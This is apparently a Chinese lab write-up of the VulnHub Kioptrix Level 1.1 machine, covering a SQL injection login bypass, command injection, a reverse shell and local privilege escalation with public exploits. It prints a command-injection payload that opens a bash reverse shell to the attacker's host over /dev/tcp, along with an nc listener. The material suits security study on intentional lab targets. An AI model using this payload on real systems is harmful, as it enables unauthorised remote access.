Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录

环境:靶机:192.168.1.107   kali:192.168.1.106 

主机发现

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第1张图片

端口扫描

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第2张图片

浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第3张图片

成功进入,经典ping命令,存在命令执行

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第4张图片

kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到 kali攻击机

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第5张图片

成功反弹但不是root权限,开始提权,搜索可用exp

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第6张图片

实践了9542.c、9545.c都可以, 这儿选用9545.c演示,为什么呢。。。。。为了能直接在kali上gcc编译(后面证实我还是太年轻了,就算9545.c编译好后还是得在靶机环境上执行,编译与执行环境不同可能都报错,所以后面还是老老实实靶机上重新编译执行了),9542.c是32位程序,9545.c貌似兼容32与64位系统都可编译,我kali是64位,系统不兼容编译会出现如下报错,要在kali上编译得修改exp代码,楼主太菜了暂不去深究改法,靶机是32位的可以在靶机上编译

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第7张图片

命令:  gcc  9545.c -o 9545  kali上编译好文件9545

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第8张图片

编译好文件9545要传输到靶机上,可在kali上利用python搭建一http服务器,提供一个文件浏览的web服务,然后靶机wget下载编译好的文件即可

python -m SimpleHTTPServer 8888   #python2中启动一个简单的http服务器
python3 -m http.server  8888      #python3中启动一个简单的http服务器

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第9张图片

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第10张图片

靶机shell页面wget下载编译好文件9545执行,报错。。。。一顿操作无果

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第11张图片

没办法老老实实重新编译,执行,提权成功

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第12张图片

9542.c也一样,注意点是文件要下载到tmp目录下,cd /tmp目录下,因为临时文件夹才有可写权限下载编译文件,其他目录下没有,会报错如下图

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第13张图片

 但执行权限还是有的,验证如下图

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第14张图片

正确姿势是下面这样的: 

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第15张图片

最后passwd 重置密码即可登录root用户 ,game over了

Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录_第16张图片

 

 

你可能感兴趣的:(Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录)